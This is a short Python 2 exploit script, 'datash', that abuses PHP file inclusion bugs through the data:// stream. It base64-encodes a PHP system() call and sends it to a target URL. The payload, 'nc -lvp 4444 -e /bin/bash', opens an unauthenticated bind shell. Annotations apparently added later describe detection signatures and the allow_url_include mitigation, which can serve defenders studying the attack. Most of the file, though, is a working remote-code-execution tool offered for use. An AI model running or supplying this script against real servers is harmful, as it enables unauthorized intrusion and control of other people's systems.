#!/usr/bin/python
# datash v0.1
# Uses PHP's data:// stream for RCE
# For abusing File Inclusion Bugs.
# Author: Darren 'infodox' Martyn
# Site: insecurety.net
# Twatter: @info_dox
import sys
import requests

def banner():
    """Write the tool's name, version and short description to stdout.

    Python 2 only (uses the ``print`` statement). Takes no arguments and
    returns None.
    """
    text = """
                    data shell
          datash v0.1 - Insecurety Research
Abuses PHP's data:// stream to execute remote code on servers which are
1. Vulnerable to File Inclusion
2. Allowing data:// to be included
Reliable enough...
 ~ infodox
"""
    print text

# Argument check: exactly one argument is required (the URL prefix that the
# data:// URI gets appended to). Otherwise print the banner and usage text and
# exit with status 1.
if len(sys.argv) != 2:
    banner()
    print "Usage: ./datash.py <target url>"
    print "Example: ./datash.py http://localhost/include.php?hax="
    sys.exit(1)
    
targeturl = sys.argv[1]
# Fixed shell command: a netcat listener on TCP 4444 that hands each connection
# to /bin/bash. Nothing in the command authenticates whoever connects.
# Detection: an unexpected listener on 4444, or nc/bash processes spawned by
# the web server's user, are the host-side indicators of this payload.
payload = """nc -lvp 4444 -e /bin/bash &""" # FIXME - Multiple payloads later ;) This is just PoC
# The command is placed unescaped inside a single-quoted PHP system() call.
phpwrapper = """<?php system('%s'); ?>""" %(payload) # FIXME - Allow multiple PHP wrappers... Later!
# Python 2 only: str.encode('base64') does not exist on Python 3.
# Detection: the base64 of "<?php" always begins with "PD9waHA", so that prefix
# following "base64," in a request parameter is a usable log/WAF signature.
encodedphp = phpwrapper.encode('base64') # Base64 encode the php wrapper with the payload in it
# Mitigation: PHP honours data:// in include/require only when
# allow_url_include is enabled (it is off by default), and only if the
# application passes the request parameter to include without restricting it
# to an allowlist of local files.
inject = """data://text/plain;base64,%s""" %(encodedphp) # This is the data:// injecty thingy :3
print "[+] Target Host: %s" %(targeturl)
# This message is printed before the request is sent, not after any confirmation.
print "[*] Popping Shell on 4444... Use netcat to connect..."
# Plain string concatenation: the URI is appended as-is to the command-line
# argument, so it shows up in the query string of the target's access log.
hack = targeturl+inject
# A single GET. The response is discarded and no status is checked, so unless
# the call raises, the final message prints whether or not the target included
# the URI.
requests.get(hack) # Like my terrible variable names and use of Requests? You better!
print "[:>] Hope you had fun ;)"